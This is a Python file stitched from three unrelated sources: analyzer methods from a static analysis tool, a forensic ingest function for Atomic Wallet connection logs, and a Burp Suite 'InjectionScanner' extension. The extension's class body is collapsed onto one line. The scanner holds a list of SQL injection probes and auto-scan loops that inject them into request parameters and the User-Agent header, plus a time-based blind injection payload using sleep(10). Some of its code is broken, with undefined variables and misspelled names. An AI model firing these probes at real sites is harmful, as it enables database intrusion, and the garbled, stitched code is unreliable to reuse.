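        # the directory with os.path.join(*path.split(os.sep)[:-1]) dropped it
        # and raised TypeError for a path without any separator.
        self.setCWD(os.path.dirname(path) or None)
        Analyzer.self.pushImportStack(path)
        try:
            mod = self.parseAndResolve(path)
        finally:
            # The entry was never popped before, so the "stack" only grew and
            # stopped describing the imports actually in progress.
            Analyzer.self.popImportStack(path)
            # restore old CWD
            self.setCWD(oldcwd)
        return mod

    def isInLoadPath(self, dir):
        """Return True when *dir* equals one of the load-path entries."""
        # was a bare getLoadPath(), which raises NameError inside a method
        for s in self.getLoadPath():
            if File(s) == dir:
                return True
        return False

    def parseAndResolve(self, file_):
        """Resolve the AST of *file_* against the module table; None on parse failure or MemoryError."""
        self.finer("Analyzing: " + file_)
        # loadingProgress is only created by loadFileRecursive
        if self.loadingProgress is not None:
            self.loadingProgress.tick()
        try:
            ast = self.getAstForFile(file_)
            if ast is None:
                self.failedToParse.add(file_)
                return None
            else:
                self.finer("resolving: " + file_)
                mod = ast.resolve(self.moduleTable)
                assert isinstance(mod, ModuleType)
                self.finer("[success]")
                self.loadedFiles.append(file_)
                return mod
        except MemoryError as e:
            # Drop the AST cache and collect garbage, then give up on this file
            if self.astCache is not None:
                self.astCache.clear()
            import gc
            gc.collect()
            return None

    def createCacheDir(self):
        """ generated source for method createCacheDir """
        # NOTE(review): the cache sits at a fixed, predictable location under
        # the system temp directory and is created with default permissions.
        # On a shared host, cache content written by another local user would
        # be trusted on the next run; how AstCache reads entries back is not
        # visible here - confirm, and prefer a per-user, owner-only directory.
        self.cacheDir = _.makePathString(_.getSystemTempDir(), "pysonar2", "ast_cache")
        f = self.cacheDir
        _.msg("AST cache is at: " + self.cacheDir)
        if not os.path.exists(f):
            os.makedirs(f)
            if not os.path.exists(f):
                _.die("Failed to create tmp directory: " + self.cacheDir + ".Please check permissions")

    def getAstCache(self):
        """ generated source for method getAstCache """
        if self.astCache is None:
            self.astCache = AstCache.get()
        return self.astCache.INSTANCE

    #
    # * Returns the syntax tree for {@code file}. <p>
    #
    def getAstForFile(self, file_):
        return self.getAstCache().getAST(file_)

    def getBuiltinModule(self, qname):
        return self.builtins.get(qname)

    def makeQname(self, names):
        """Join the ``id`` of each name node with dots; "" for an empty list."""
        if _.isEmpty(names):
            return ""
        return ".".join([n.id for n in names])

    #
    # * Find the path that contains modname. Used to find the starting point of locating a qname.
    # *
    # * @param headName first module name segment
    #
    def locateModule(self, headName):
        for p in self.getLoadPath():
            startDir = os.sep.join([p, headName])
            initFile = _.joinPath(startDir, "__init__.py")
            if os.path.exists(initFile):
                return p
            startFile = startDir + ".py"
            if os.path.exists(startFile):
                return p
        return None

    def loadModule(self, name, scope):
        """Load the module named by the node list *name* and bind it in *scope*.

        Builtin modules are bound directly. Otherwise each segment is loaded
        in turn (package ``__init__.py`` first, a plain ``.py`` file for the
        last segment) and bound into its parent's table. Returns the last
        module loaded, or None when a segment cannot be found or loaded.
        """
        if _.isEmpty(name):
            return None
        from Binding import Binding
        qname = self.makeQname(name)
        mt = self.getBuiltinModule(qname)
        if mt is not None:
            scope.insert(
                name[0].id,
                Url(Builtins.LIBRARY_URL + mt.getTable().getPath() + ".html"),
                mt, Binding.Kind.SCOPE)
            return mt
        # If there's more than one segment
        # load the packages first
        prev = None
        startPath = self.locateModule(name[0].id)
        if startPath is None:
            return None
        path = startPath
        for i, n in enumerate(name):
            path = os.sep.join([path, n.id])
            initFile = _.joinPath(path, "__init__.py")
            if os.path.isfile(initFile):
                mod = self.loadFile(initFile)
                if mod is None:
                    return None
                if prev is not None:
                    prev.getTable().insert(n.id, n, mod, Binding.Kind.VARIABLE)
                else:
                    scope.insert(n.id, n, mod, Binding.Kind.VARIABLE)
                prev = mod
            elif i == len(name) - 1:
                startFile = path + ".py"
                if os.path.isfile(startFile):
                    mod = self.loadFile(startFile)
                    if mod is None:
                        return None
                    if prev is not None:
                        prev.getTable().insert(n.id, n, mod, Binding.Kind.VARIABLE)
                    else:
                        scope.insert(n.id, n, mod, Binding.Kind.VARIABLE)
                    prev = mod
                else:
                    return None
        return prev

    #
    # * Load all Python source files recursively if the given fullname is a
    # * directory; otherwise just load a file. Looks at file extension to
    # * determine whether to load a given file.
    #
    def loadFileRecursive(self, fullname):
        if self.loadingProgress is None:
            self.loadingProgress = FancyProgress(self.countFileRecursive(fullname), 50)
        if os.path.isdir(fullname):
            # os.walk already descends into sub-directories; recursing into
            # each directory as well re-walked (and re-counted) every subtree.
            for root, dirs, files in os.walk(fullname):
                for f in files:
                    if f.endswith(".py"):
                        self.loadFile(root + os.sep + f)
        else:
            if fullname.endswith(".py"):
                self.loadFile(fullname)

    # count number of .py files
    def countFileRecursive(self, fullname):
        """Return the number of ``.py`` files under *fullname*, each counted once."""
        if not os.path.isdir(fullname):
            return 1 if fullname.endswith(".py") else 0
        total = 0
        for root, dirs, files in os.walk(fullname):
            for f in files:
                if f.endswith(".py"):
                    total += 1
        return total

    def finish(self):
        """ generated source for method finish """
        #         progress.end();
        _.msg("\nFinished loading files. " + str(self.nCalled) + " functions were called.")
        _.msg("Analyzing uncalled functions")
        self.applyUncalled()
        # mark unused variables
        for b in self.allBindings:
            if not b.getType().isClassType() and not b.getType().isFuncType(
            ) and not b.getType().isModuleType() and _.isEmpty(b.getRefs()):
                Analyzer.self.putProblem(
                    b.getNode(), "Unused variable: " + b.__class__.__name__)
        for ent in self.references.items():
            self.convertCallToNew(ent[0], ent[1])
        _.msg(self.getAnalysisSummary())

    def close(self):
        """ generated source for method close """
        self.astCache.close()

    def convertCallToNew(self, ref, bindings):
        """ generated source for method convertCallToNew """
        if ref.isRef():
            return
        if len(bindings) == 0:
            return
        nb = bindings[0]
        t = nb.getType()
        if t.isUnionType():
            t = t.asUnionType().firstUseful()
            if t is None:
                return
        if not t.isUnknownType() and not t.isFuncType():
            ref.markAsNew()

    def addUncalled(self, cl):
        """ generated source for method addUncalled """
        if not cl.func.called:
            self.uncalled.add(cl)

    def removeUncalled(self, f):
        if f in self.uncalled:
            self.uncalled.remove(f)

    def applyUncalled(self):
        """ generated source for method applyUncalled """
        progress = FancyProgress(len(self.uncalled), 50)
        # Terminates only if applying a call removes it from self.uncalled
        # (presumably via removeUncalled - verify in Call.apply).
        while not _.isEmpty(self.uncalled):
            uncalledDup = list(self.uncalled)
            for cl in uncalledDup:
                progress.tick()
                Call.apply(cl, None, None, None, None, None)

    def getAnalysisSummary(self):
        """Return the multi-line summary text printed at the end of a run."""
        sb = []
        sb.append("\n" + _.banner("analysis summary"))
        duration = _.formatTime(_.millis() - self.stats.getInt("startTime"))
        sb.append("\n- total time: " + duration)
        sb.append("\n- modules loaded: " + str(len(self.loadedFiles)))
        sb.append("\n- semantic problems: " + str(len(self.semanticErrors)))
        sb.append("\n- failed to parse: " + str(len(self.failedToParse)))
        # calculate number of defs, refs, xrefs
        nDef = 0
        nXRef = 0
        for b in self.getAllBindings():
            nDef += 1
            nXRef += len(b.getRefs())
        sb.append("\n- number of definitions: " + str(nDef))
        sb.append("\n- number of cross references: " + str(nXRef))
        sb.append("\n- number of references: " + str(len(self.getReferences())))
        resolved = self.stats.getInt("resolved")
        unresolved = self.stats.getInt("unresolved")
        sb.append("\n- resolved names: " + str(resolved))
        sb.append("\n- unresolved names: " + str(unresolved))
        sb.append("\n- name resolve rate: " + _.percent(resolved, resolved + unresolved))
        sb.append("\n" + _.getGCStats())
        return ''.join(sb)

    def getLoadedFiles(self):
        """Return the loaded files whose name ends in ``.py``."""
        files = ArrayList()
        for file_ in self.loadedFiles:
            if file_.endswith(".py"):
                files.append(file_)
        return files

    def registerBinding(self, b):
        self.allBindings.append(b)

    def log(self, level, msg):
        # the level is accepted but not used; every message goes to _.msg
        _.msg(msg)

    def severe(self, msg):
        self.log(Level.SEVERE, msg)

    def warn(self, msg):
        self.log(Level.WARNING, msg)

    def info(self, msg):
        self.log(Level.INFO, msg)

    def fine(self, msg):
        self.log(Level.FINE, msg)

    def finer(self, msg):
        self.log('*a log level*', msg)

    def __str__(self):
        # the counts are ints; concatenating them to str directly raised TypeError
        return "<Analyzer:locs=" + str(len(self.references)) + ":probs=" + str(len(
            self.semanticErrors)) + ":files=" + str(len(self.loadedFiles)) + ">"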
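def processConnectionLogs(self, logFile, abstractFile):
    """Turn connect/disconnect lines of a wallet log into blackboard artifacts.

    Each matching line yields one TSK_ATOMIC_WALLET_APP_TIMES artifact on
    *abstractFile* carrying the connection type ("Connect" or "Disconnect")
    and the time built from the line's first two space-separated fields.
    All connect artifacts are created before the disconnect ones.

    Failures while adding attributes or indexing are logged and skipped, so
    one bad entry does not stop the rest.
    """
    moduleName = AttomicWalletIngestModuleFactory.moduleName
    connectTimes = []
    disconnectTimes = []
    with open(logFile) as logHandle:
        for logLine in logHandle:
            # "Disconnected" contains the substring "connected", so the
            # disconnect marker has to be tested first; checked the other way
            # round such a line is recorded as a connect and skews the timeline.
            # NOTE(review): matching is case-sensitive - confirm the exact
            # wording the application writes.
            if "Disconnect" in logLine:
                bucket = disconnectTimes
            elif "connected" in logLine:
                bucket = connectTimes
            else:
                continue
            fields = logLine.split(" ")
            bucket.append(int(self.getDateTime(fields[0], fields[1])))

    try:
        artId = self.createArtifact("TSK_ATOMIC_WALLET_APP_TIMES", "Atomic Wallet Connect/Disconnect Times")
        for connType, eventTimes in (("Connect", connectTimes), ("Disconnect", disconnectTimes)):
            for eventTime in eventTimes:
                artifact = abstractFile.newArtifact(artId)
                attributes = ArrayList()
                attId = self.createAttribute("TSK_ATOMIC_WALLET_CONNECTION_TYPE", "string", "Atomic Wallet Connection Type")
                attributes.add(BlackboardAttribute(attId, moduleName, connType))
                attId = self.createAttribute("TSK_ATOMIC_WALLET_TIME", "datetime", "Atomic Wallet Time")
                attributes.add(BlackboardAttribute(attId, moduleName, eventTime))
                # Bare excepts are kept on purpose: each step is best-effort
                # and only logged.
                try:
                    artifact.addAttributes(attributes)
                except:
                    self.log(Level.INFO, "Error adding attribute to artifact")
                try:
                    self.indexArtifact(artifact)
                except:
                    self.log(Level.INFO, "Error indexing artifact")
    except:
        self.log(Level.INFO, "Error adding attribute")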
class BurpExtender(IBurpExtender, IContextMenuFactory, ITab, IExtensionStateListener, IMessageEditorController, IHttpListener): ''' IBurpExtender: Hook into burp and inherit base classes ITab: Create new tabs inside burp IMessageEditorTabFactory: Access createNewInstance ''' def registerExtenderCallbacks(self, callbacks): # Set encoding to utf-8 to avoid some errors reload(sys) sys.setdefaultencoding('utf8') # Keep a reference to callback object and helper object self._callbacks = callbacks self._helpers = callbacks.getHelpers() # Set the extension name that shows in the burp extension menu callbacks.setExtensionName("InjectionScanner") # Create the log and a lock on which to synchronize when adding log entries self._log = ArrayList() self._logLock = Lock() self._httpLock = Lock() # The length of the basis used to fetch abnormal data, default to zero self._basisLen = 0 # 1: {POST. GET}; 2: {urlencoded, json, xml} self._postGet = 'NaN' self._dataType = 'NaN' # Scan list self._simpleList = [ '\'', '\"', '/', '/*', '#', ')', '(', ')\'', '(\'', 'and 1=1', 'and 1=2', 'and 1>2', 'and 12', '+', 'and+12', '/**/and/**/1' ] self._xmlList = ['a', 'b', 'c', 'd', 'e'] # Not setted # Response mutex: True = is blocking; False = free to go # self._mutexR = False # Other classes instance self._dataTable = Guis_DefaultTM() self._logTable = Guis_AbstractTM(self) self._xh = XMLHandler() listeners = Guis_Listeners(self, self._logTable) ''' Setting GUIs ''' # Divide the whole pane two: one upper and one lower pane self._mainSplitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT) self._mainSplitpane.setResizeWeight(0.4) # Initizlize request table dataTable = JTable(self._dataTable) dataScrollPane = JScrollPane(dataTable) dataScrollPane.setPreferredSize(Dimension(0, 125)) self._dataTable.addTableModelListener(listeners) # Initialize log table logTable = Guis_LogTable(self._logTable) logScrollPane = JScrollPane(logTable) logScrollPane.setPreferredSize(Dimension(0, 125)) # Split the upper pane to 
two panes tableSplitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT) tableSplitpane.setResizeWeight(0.5) # Set the data table to the left and log to the right tableSplitpane.setLeftComponent(dataScrollPane) tableSplitpane.setRightComponent(logScrollPane) # Tabs with request/response viewers tabs = JTabbedPane() self._requestViewer = callbacks.createMessageEditor(self, False) self._responseViewer = callbacks.createMessageEditor(self, False) tabs.addTab("Request", self._requestViewer.getComponent()) tabs.addTab("Response", self._responseViewer.getComponent()) # Create buttons that do operation with the test self._basisLabel = JLabel('Basis: ' + str(self._basisLen)) self._levelLabel = JLabel('Level:') self._setBasisButton = JButton('Set Basis') self._hitOnceButton = JButton('Hit Once') self._autoScanButton = JButton('Auto Scan') self._clearLogButton = JButton('Clear Log') self._cancelButton = JButton('Cancel') self._levelSelection = JComboBox() self._levelSelection.addItem('1') self._levelSelection.addItem('2') self._levelSelection.addItem('3') self._hitOnceButton.addActionListener(listeners) self._autoScanButton.addActionListener(listeners) self._clearLogButton.addActionListener(listeners) self._setBasisButton.addActionListener(listeners) self._cancelButton.addActionListener(listeners) self._basisLabel.setPreferredSize(Dimension(100, 20)) # Create bottom pane for holding the buttons buttonPane = JPanel() buttonPane.setLayout(BorderLayout()) centerPane = JPanel() leftPane = JPanel() rightPane = JPanel() leftPane.add(self._basisLabel) centerPane.add(self._setBasisButton) centerPane.add(self._hitOnceButton) centerPane.add(self._autoScanButton) centerPane.add(self._cancelButton) centerPane.add(self._clearLogButton) rightPane.add(self._levelLabel) rightPane.add(self._levelSelection) buttonPane.add(centerPane, BorderLayout.CENTER) buttonPane.add(leftPane, BorderLayout.WEST) buttonPane.add(rightPane, BorderLayout.EAST) # Create and set the bottom panel that holds viewers and 
buttons utilPane = JPanel() utilPane.setLayout(BorderLayout()) utilPane.add(tabs, BorderLayout.CENTER) utilPane.add(buttonPane, BorderLayout.SOUTH) self._mainSplitpane.setLeftComponent(tableSplitpane) self._mainSplitpane.setRightComponent(utilPane) # Customize UI components callbacks.customizeUiComponent(self._mainSplitpane) callbacks.customizeUiComponent(dataTable) callbacks.customizeUiComponent(dataScrollPane) callbacks.customizeUiComponent(logTable) callbacks.customizeUiComponent(logScrollPane) callbacks.customizeUiComponent(tabs) callbacks.customizeUiComponent(buttonPane) callbacks.customizeUiComponent(utilPane) callbacks.customizeUiComponent(self._basisLabel) callbacks.customizeUiComponent(self._setBasisButton) callbacks.customizeUiComponent(self._hitOnceButton) callbacks.customizeUiComponent(self._autoScanButton) callbacks.customizeUiComponent(self._clearLogButton) callbacks.customizeUiComponent(self._levelSelection) callbacks.customizeUiComponent(self._cancelButton) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) # Register the context menu and message editor for new tabs callbacks.registerContextMenuFactory(self) # Register as a HTTP listener callbacks.registerHttpListener(self) return ''' ITab implementation ''' def getTabCaption(self): return 'InjectionScanner' def getUiComponent(self): return self._mainSplitpane ''' IContextMenuFactory implementation ''' def createMenuItems(self, invocation): menu = [] # Which part of the interface the user selects ctx = invocation.getInvocationContext() # Message viewer request will show menu item if selected by the user if ctx == 0 or ctx == 2: menu.append( swing.JMenuItem("Send to InjectionScanner", None, actionPerformed=lambda x, inv=invocation: self. 
sendToExtender(inv))) return menu if menu else None ''' IMessageEditorController Implementation ''' def getHttpService(self): return self._currentlyDisplayedItem.getHttpService() def getRequest(self): return self._currentlyDisplayedItem.getRequest() def getResponse(self): return self._currentlyDisplayedItem.getResponse() ''' IHttpListener implementation ''' def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): # Skip this function if the message is request if messageIsRequest: return # Lock the log entry in case race condition self._logLock.acquire() row = self._log.size() # Fetch request message requestBody = messageInfo.getRequest() requestInfo = self._helpers.analyzeResponse(requestBody) requestHeaders = requestInfo.getHeaders() if self._postGet == 'POST': requestData = self._helpers.bytesToString( requestBody[requestInfo.getBodyOffset():]) elif self._postGet == 'GET': for header in requestHeaders: if 'GET' in header: # If the request is GET, update the GET data requestUrl = re.sub('^GET\s+', '', header, re.IGNORECASE) requestUrl = re.sub('\sHTTP/1.1\S*', '', requestUrl, re.IGNORECASE) if '?' in requestUrl: requestData = re.sub('\S*\?', '', requestUrl, re.IGNORECASE) else: print('processHttpMessage: no parameter in GET url') else: print('processHttpMessage: _postGet not defined') self._logLock.release() return # Fetch the http type (GET/POST) httpType = requestHeaders[0].split(' ') # Fetch response message responseBody = messageInfo.getResponse() responseInfo = self._helpers.analyzeResponse(responseBody) responseHeaders = responseInfo.getHeaders() self._responseLength = '' # Fetch the content length self._responseLength = self.fetchContentLength(responseHeaders) # If the response message is auto-generated, ignore it. 
If not, add it into the log list if self._callbacks.getToolName(toolFlag) != 'Proxy': self._log.add( LogEntry(httpType[0], requestData, self._callbacks.saveBuffersToTempFiles(messageInfo), self._responseLength)) self._logTable.fireTableRowsInserted(row, row) self._logLock.release() ''' Fetch content length from the headers given ''' def fetchContentLength(self, fromHeaders): for header in fromHeaders: if re.search('^Content-Length', header, re.IGNORECASE) is not None: return re.sub('^Content-Length\:\s+', '', header, re.IGNORECASE) ''' When the user select 'Send to InjectionScanner', call this function ''' def sendToExtender(self, invocation): # Init/reset request data before sending to extender self.initRequestInfo() try: # Initialize basic information invMessage = invocation.getSelectedMessages() requestMessage = invMessage[0] requestInfo = self._helpers.analyzeRequest(requestMessage) self._requestBody = requestMessage.getRequest() # Set the _currentlyDisplayedItem so each time the data is sent to the extender self._currentlyDisplayedItem = self._callbacks.saveBuffersToTempFiles( requestMessage) # Fetch the request data bodyLen = len(self._helpers.bytesToString(self._requestBody)) if requestInfo.getBodyOffset() < bodyLen: self._requestData = self._helpers.bytesToString( self._requestBody[requestInfo.getBodyOffset():]) elif requestInfo.getBodyOffset() == bodyLen: self._requestData = '' else: print('sendToExtender: body length < body offset') # Fetch the headers and Http service requestHeaders = list(requestInfo.getHeaders()) self._httpService = requestMessage.getHttpService() # Initialize POST/GET identifier and User-Agent for header in requestHeaders: if re.search('^POST', header, re.IGNORECASE) is not None: self._postGet = 'POST' elif re.search('^GET', header, re.IGNORECASE) is not None: self._postGet = 'GET' # If the request is GET, initialize the url and GET data self._requestUrl = re.sub('^GET\s+', '', header, re.IGNORECASE) self._requestUrl = 
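re.sub('\sHTTP/1.1\S*', '', self._requestUrl, re.IGNORECASE) if '?' in self._requestUrl: self._requestDataGet = re.sub('\S*\?', '', self._requestUrl, re.IGNORECASE) else: print('sendToExtender: no parameter in GET url') # If the request if POST, fetch the request data type by content type if self._postGet == 'POST' and re.search( '^Content-Type', header, re.IGNORECASE) is not None: contentType = re.sub('^Content-Type', '', header, re.IGNORECASE) if 'urlencoded' in contentType: self._dataType = 'urlencoded' elif 'json' in contentType: self._dataType = 'json' elif 'xml' in contentType or 'http' in conentType: self._dataType = 'xml' else: print( 'sendToExtender: _dataType is not supported, do not scan' ) # Initialze the User-Agent if it exists if re.search('^User-Agent', header, re.IGNORECASE) is not None: self._userAgent = re.sub('^User-Agent\:\s+', '', header, re.IGNORECASE) # If there's no content type in the header,fetch from data if self._postGet == 'POST' and self._dataType == '': if self._requestData != '': if self._requestData[ 0] == '{' and '}' in self._requestData and ':' in self._requestData: self._dataType = 'json' elif self._requestData[0] == '<' and self._requestData[ -1] == '>': self._dataType = 'xml' else: self._dataType = 'urlencoded' else: print( 'sendToExtender: _postGet is POST but _requestData is null' ) # Clear the table before adding elements self._dataTable.setRowCount(0) # Update request viewer self.updateRequestViewer() # Fill request data self.fillRequestData() except Exception as e: print(e)

''' Fill the data into the request table '''


def fillRequestData(self):
    """Fill self._dataDict and the request table from the parsed request.

    GET parameters are read from self._requestDataGet. POST bodies are read
    from self._requestData and parsed according to self._dataType
    ('urlencoded', 'json' or 'xml'). Every parameter added bumps
    self._dataLen; the URL and User-Agent rows are not counted.
    """
    # If _postGet is GET, also adds URL to the table
    if self._postGet == 'GET':
        dataList = self._requestDataGet.split('&')
        for data in dataList:
            if '=' in data:
                x = data.split('=', 1)
                self._dataDict[str(x[0])] = str(x[1])
                self._dataTable.addRow([str(x[0]), str(x[1])])
                self._dataLen += 1
        self._dataTable.addRow(['URL', self._requestUrl])
        # The URL row sits right after the parameter rows.
        self._UrlRow = self._dataLen
        if self._userAgent != '':
            self._dataTable.addRow(['User-Agent', self._userAgent])
    elif self._postGet == 'POST':
        if self._dataType == 'urlencoded':
            dataList = self._requestData.split('&')
            for data in dataList:
                if '=' in data:
                    x = data.split('=', 1)
                    self._dataDict[str(x[0])] = str(x[1])
                    self._dataTable.addRow([str(x[0]), str(x[1])])
                    self._dataLen += 1
        elif self._dataType == 'json':
            # NOTE(review): the loop below assumes the body is a JSON object;
            # nested values are flattened to their str() form.
            self._dataDict = json.loads(self._requestData)
            for key in self._dataDict:
                # Convert '"' to '\"' to be the same as that in the data
                value = str(self._dataDict[key])
                if '\"' in value:
                    value = value.replace('\"', '\\\"')
                self._dataDict[key] = value
                self._dataTable.addRow([str(key), self._dataDict[key]])
                self._dataLen += 1
        elif self._dataType == 'xml':
            # Use xml package to convert the xml string to dict
            # Note1: the xml dict will be in reverse order
            # Note2: the attribute will also be added into dict, need to be pop
            # Note3: special characters like \" will be considered as "
            # NOTE(review): the body is handed to the default SAX parser and
            # nothing here configures DTD / external-entity handling; confirm
            # they are disabled before parsing bodies captured from traffic.
            xml.sax.parseString(self._requestData, self._xh)
            # Text between the leading '<' and the first '>'. The original
            # called re.sub with re.IGNORECASE in the `count` position; a plain
            # split yields the same string without the misplaced flag.
            self._attr = self._requestData[1:].split('>', 1)[0]
            self._dataDict = self._xh.getDict()
            # NOTE(review): raises KeyError when the handler's dict has no
            # entry named like the opening tag (e.g. a tag with attributes).
            self._dataDict.pop(self._attr)
            for key in self._dataDict:
                self._dataTable.addRow(
                    [str(key), str(self._dataDict[key])])
                self._dataLen += 1
        else:
            print('fillRequestData: _dataType not defined')
        if self._userAgent != '':
            self._dataTable.addRow(['User-Agent', self._userAgent])
            self._savedUserAgent = self._userAgent
    else:
        print('fillRequestData: _postGet not defined')


''' Receive & update the response after sending request to the server '''


def receiveResponse(self):
    """Reset the response fields and send the current request on a new thread.

    Returns as soon as the thread is started; the response is stored by
    makeRequest when the call completes.
    """
    # Init/reset response data before receiving response
    self.initResponseInfo()
    # Launch the http thread
    self._httpThread = Thread(target=self.makeRequest,
                              args=(
                                  self._httpService,
                                  self._requestBody,
                              ))
    self._httpThread.start()


''' Make Http request to a service '''


def makeRequest(self, httpService, requestBody):
    """Send requestBody to httpService and store the result in
    self._responseMessage, holding self._httpLock for the duration.
    """
    self._httpLock.acquire()
    try:
        # Disable the hit buttons before starting the thread
        self._hitOnceButton.setEnabled(False)
        self._autoScanButton.setEnabled(False)
        self._responseMessage = self._callbacks.makeHttpRequest(
            httpService, requestBody)
    finally:
        # Runs even when the request raises: otherwise the lock stays held,
        # every later request thread blocks on acquire(), and the buttons
        # stay disabled.
        try:
            # Enable the hit buttons
            self._hitOnceButton.setEnabled(True)
            self._autoScanButton.setEnabled(True)
        finally:
            # Unblock the mutex
            self._httpLock.release()


''' updateRequestViewer '''


def updateRequestViewer(self):
    """Show the current request in the request viewer."""
    self._requestViewer.setMessage(self.getRequest(), True)


''' updateResponseViewer '''


def updateResponseViewer(self):
    """Show the current response in the response viewer."""
    self._responseViewer.setMessage(self.getResponse(), False)


''' Level 1 auto: only loop through the data, do not modify the 'submit' section '''


def autoScan1(self):
    """Write each candidate value into each parameter row and send the request.

    Rows whose name or value contains 'submit' or 'search' are left alone in
    the GET and urlencoded/json cases; the XML case applies self._xmlList to
    every row. Each row is set back to its base value afterwards.
    """
    # TODO: Add a 'cancel' button to stop when the user think it takes too long
    # TODO: Add XML support
    if self._postGet == 'GET':
        for i in range(0, self._dataLen):
            title = self._dataTable.getValueAt(i, 0)
            baseValue = self._dataDict[title]
            for value in self._simpleList:
                # TODO: update more value that should not be changed
                if ('submit' not in title.lower()
                        and 'submit' not in self._dataDict[title].lower()
                        and 'search' not in title.lower()
                        and 'search' not in self._dataDict[title].lower()):
                    # Update the table in case the loop interrupt in the middle
                    # Note that the URL will be automatically updated due to this code, so no need to manually update the URL section
                    self._dataTable.setValueAt(value, i, 1)
                    # Send & request the HTTP request/response
                    self.updateRequestViewer()
                    self.receiveResponse()
            # Reset the table
            # NOTE(review): nesting of this reset was recovered from a
            # collapsed listing; confirm it belongs after the value loop.
            self._dataTable.setValueAt(baseValue, i, 1)
    if self._postGet == 'POST':
        if self._dataType == 'urlencoded' or self._dataType == 'json':
            for i in range(0, self._dataLen):
                title = self._dataTable.getValueAt(i, 0)
                baseValue = self._dataDict[title]
                if ('submit' in title.lower()
                        or 'submit' in self._dataDict[title].lower()
                        or 'search' in title.lower()
                        or 'search' in self._dataDict[title].lower()):
                    continue
                for value in self._simpleList:
                    self._dataTable.setValueAt(value, i, 1)
                    self.updateRequestViewer()
                    self.receiveResponse()
                # Reset the table
                self._dataTable.setValueAt(baseValue, i, 1)
        elif self._dataType == 'xml':
            for i in range(0, self._dataLen):
                title = self._dataTable.getValueAt(i, 0)
                baseValue = self._dataDict[title]
                for value in self._xmlList:
                    # Update the table in case the loop interrupt in the middle
                    self._dataTable.setValueAt(value, i, 1)
                    # Send & request the HTTP request/response
                    self.updateRequestViewer()
                    self.receiveResponse()
                # Reset the table
                self._dataTable.setValueAt(baseValue, i, 1)


''' Level 2 auto: loop through the data as well as the user agent (if exist) '''


def autoScan2(self):
    """Run the level 1 scan, first cycling the User-Agent header through
    self._simpleList when the request has one.
    """
    # If the User-Agent does not exist, only performs level 1 auto
    if self._userAgent != '':
        baseUserAgent = self._userAgent
        baseExpression = 'User-Agent: ' + baseUserAgent
        for value in self._simpleList:
            oldExpression = 'User-Agent: ' + self._userAgent
            newExpression = 'User-Agent: ' + value
            # Update the values accordingly
            requestBodyString = self._helpers.bytesToString(
                self._requestBody)
            self._requestBody = requestBodyString.replace(
                oldExpression, newExpression)
            self._userAgent = value
            self.updateRequestViewer()
            self.receiveResponse()
        # Reset the value back to original after each loop
        # The header currently in the body is always the one built from
        # self._userAgent; deriving it here (instead of reusing the loop
        # variable) avoids a NameError when self._simpleList is empty.
        currentExpression = 'User-Agent: ' + self._userAgent
        requestBodyString = self._helpers.bytesToString(self._requestBody)
        self._requestBody = requestBodyString.replace(
            currentExpression, baseExpression)
        # NOTE(review): self._userAgent itself is left at the last value
        # tried; only _savedUserAgent is restored. Confirm that is intended.
        self._savedUserAgent = baseUserAgent
        self.updateRequestViewer()
    # Perform level 1 scan also
    self.autoScan1()


''' Level 3 auto: Alpha: use the timer to perform blind insertion '''


# TODO: currently only GET/urlencoded is supported; add more support later
def autoScan3(self):
    """Alpha: send one delayed-response probe in a parameter and report
    whether the 5-second timer fired.
    """
    self._timeReach = False
    timer = Timer(5, self.timeReach)
    # Modify the first element to perform blind injection
    # NOTE(review): `i` is never assigned in this method, so this line raises
    # NameError as written. The setValueAt calls below use row 0; confirm the
    # intended index before changing it.
    title = self._dataTable.getValueAt(i, 0)
    oldExpression = title + '=' + self._dataDict[title]
    newExpression = title + '=' + '1\' and if(1=0,1, sleep(10)) --+'
    if self._postGet == 'GET':
        # Update the values accordingly
        requestBodyString = self._helpers.bytesToString(self._requestBody)
        self._requestBody = requestBodyString.replace(
            oldExpression, newExpression)
        self._requestDataGet = self._requestDataGet.replace(
            oldExpression, newExpression)
        self._requestUrl = self._requestUrl.replace(
            oldExpression, newExpression)
        self._dataDict[title] = '1\' and if(1=0,1, sleep(10)) --+'
        self._requestModel.setValueAt('1\' and if(1=0,1, sleep(10)) --+', 0,
                                      1)
    elif self._postGet == 'POST':
        if self._dataType == 'urlencoded':
            # Update the values accordingly
            requestBodyString = self._helpers.bytesToString(
                self._requestBody)
            self._requestBody = requestBodyString.replace(
                oldExpression, newExpression)
            self._requestData = self._requestData.replace(
                oldExpression, newExpression)
            self._dataDict[title] = '1\' and if(1=0,1, sleep(10)) --+'
            self._requestModel.setValueAt(
                '1\' and if(1=0,1, sleep(10)) --+', 0, 1)
        else:
            print('autoScan3: _dataType not supported')
    else:
        print('autoScan3: _postGet not defined')
    timer.start()
    self.updateRequestViewer()
    self.receiveResponse()
    # Print the result
    # NOTE(review): receiveResponse() only starts a thread, so this check
    # runs immediately and does not reflect how long the response took.
    if self._timeReach:
        print('Delay scan succeed')
    else:
        print('Delay scan failed')
    # Cancel the timer
    timer.cancel()


def timeReach(self):
    """Timer callback: record that the timer fired."""
    self._timeReach = True


''' Fetch the 'abnormal' payloads that shows very different response length from the normal ones '''


def getAbnormal(self, basis, coefficient):
    """Return the payloads of log entries whose response length differs from
    basis by more than the ratio coefficient, in either direction.

    Returns None when basis is 0.
    """
    # If the basis is not set, do nothing
    abnormList = ArrayList()
    if basis == 0:
        return None
    # Fetch the abnormals from the log list
    for log in self._log:
        # The second ratio is evaluated only when the first is not below
        # coefficient.
        if float(log._responseLen) / float(basis) < coefficient or float(
                basis) / float(log._responseLen) < coefficient:
            abnormList.append(log._payload)
    return abnormList


''' Turn a simple dict of key/value pairs into XML '''


def dictToXml(self, tag, d):
    """Build an Element named tag with one child per key of d; each child's
    text is str(value).
    """
    elem = Element(tag)
    for key, val in d.items():
        child = Element(key)
        child.text = str(val)
        # Add element in reverse order so that the result is correct
        elem.insert(0, child)
    return elem


''' initRequestInfo '''


def initRequestInfo(self):
    """Reset every request-related field to its empty value."""
    self._postGet = ''
    self._userAgent = ''
    self._requestUrl = ''
    self._requestBody = ''
    self._requestData = ''
    self._requestDataGet = ''
    self._httpService = None
    self._dataDict = {}
    self._dataType = ''
    self._dataLen = 0
    self._attr = ''
    self._contentLength = 0
    self._currentlyDisplayedItem = None


''' initResponseInfo '''


def initResponseInfo(self):
    """Reset every response-related field to its empty value."""
    self._responseBody = None
    self._responseMessage = None
    self._responseLength = ''


''' printRequest '''


def printRequest(self):
    """Print the request fields to stdout, one per line, between separators."""
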